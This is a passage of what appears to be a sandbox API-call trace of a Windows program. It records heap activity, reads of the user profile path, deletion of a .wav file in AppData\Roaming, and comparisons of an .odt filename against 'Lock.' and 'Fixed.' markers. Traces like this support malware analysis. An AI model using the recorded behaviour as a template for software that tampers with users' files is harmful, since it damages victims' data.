lpMsg=0x8cf708) returned 0 [0122.849] CloseHandle (hObject=0x4f4) returned 1 [0122.853] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.854] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.854] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0122.854] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0122.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0122.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0122.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0122.854] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/GYS46AI.wav", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\GYS46AI.wav", lpFilePart=0x8cedf4*="GYS46AI.wav") returned 0x2b [0122.854] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\GYS46AI.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\gys46ai.wav")) returned 0x20 [0122.854] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\GYS46AI.wav", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0a03850, ftCreationTime.dwHighDateTime=0x1d5c867, ftLastAccessTime.dwLowDateTime=0xc6771720, ftLastAccessTime.dwHighDateTime=0x1d5d632, ftLastWriteTime.dwLowDateTime=0xc6771720, ftLastWriteTime.dwHighDateTime=0x1d5d632, nFileSizeHigh=0x0, nFileSizeLow=0x18011, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="GYS46AI.wav", cAlternateFileName="")) returned 0x9a47c0 [0122.854] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\GYS46AI.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\gys46ai.wav")) returned 1 [0122.860] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0a03850, ftCreationTime.dwHighDateTime=0x1d5c867, ftLastAccessTime.dwLowDateTime=0xc6771720, ftLastAccessTime.dwHighDateTime=0x1d5d632, ftLastWriteTime.dwLowDateTime=0xc6771720, ftLastWriteTime.dwHighDateTime=0x1d5d632, nFileSizeHigh=0x0, nFileSizeLow=0x18011, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="GYS46AI.wav", cAlternateFileName="")) returned 0 [0122.860] FindClose (in: hFindFile=0x9a47c0 | out: hFindFile=0x9a47c0) returned 1 [0122.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0122.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0122.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0122.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0122.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.861] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0122.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0122.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0122.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0122.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0122.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0122.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0122.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0122.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0122.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0122.861] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0122.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0122.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0122.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0122.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0122.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92e0 [0122.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0122.861] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0122.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0122.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0122.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0122.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0122.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0122.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0122.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0122.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0122.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0122.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0122.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0122.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0122.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0122.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0122.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0122.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0122.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0122.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0122.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0122.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0122.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0122.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0122.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0122.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0122.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0122.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0122.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0122.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0122.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0122.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0122.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0122.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0122.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0122.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x58) returned 0x2a5fc00 [0122.862] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/GYS46AI.wav", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\GYS46AI.wav", lpFilePart=0x8cf650*="GYS46AI.wav") returned 0x2b [0122.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5fc00 | out: hHeap=0x2af0000) returned 1 [0122.863] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\GYS46AI.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\gys46ai.wav")) returned 0xffffffff [0122.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0122.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0122.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0122.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0122.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0122.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0122.863] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0122.863] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.863] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0122.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0122.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0122.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0122.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0122.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0122.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0122.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0122.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0122.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0122.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0122.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0122.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0122.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lNMKqFE.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NMKqFE.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0122.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MKqFE.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0122.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KqFE.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qFE.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0122.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FE.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0122.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0122.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0122.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0122.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0122.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0122.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0122.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0122.864] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0122.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0122.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0122.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0122.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0122.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0122.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0122.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0122.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0122.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0122.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0122.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0122.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0122.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0122.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0122.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0122.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0122.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0122.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0122.865] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lNMKqFE.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.865] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NMKqFE.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.865] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MKqFE.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.865] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KqFE.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.865] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qFE.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.865] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FE.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0122.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0122.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0122.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0122.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0122.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0122.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0122.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0122.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0122.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0122.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0122.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0122.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0122.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0122.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0122.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0122.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0122.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0122.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0122.866] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0122.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0122.866] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0122.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0122.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0122.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0122.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ae8 [0122.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0122.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0122.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0122.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0122.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0122.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0122.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0122.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0122.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0122.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0122.866] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0122.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0122.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0122.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90b8 [0122.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0122.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0122.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0122.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0122.867] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0122.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0122.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0122.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0122.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0122.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0122.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0122.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0122.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0122.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0122.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0122.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0122.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0122.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0122.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0122.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0122.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0122.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0122.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0122.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0122.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0122.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0122.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0122.867] HeapFree (in: 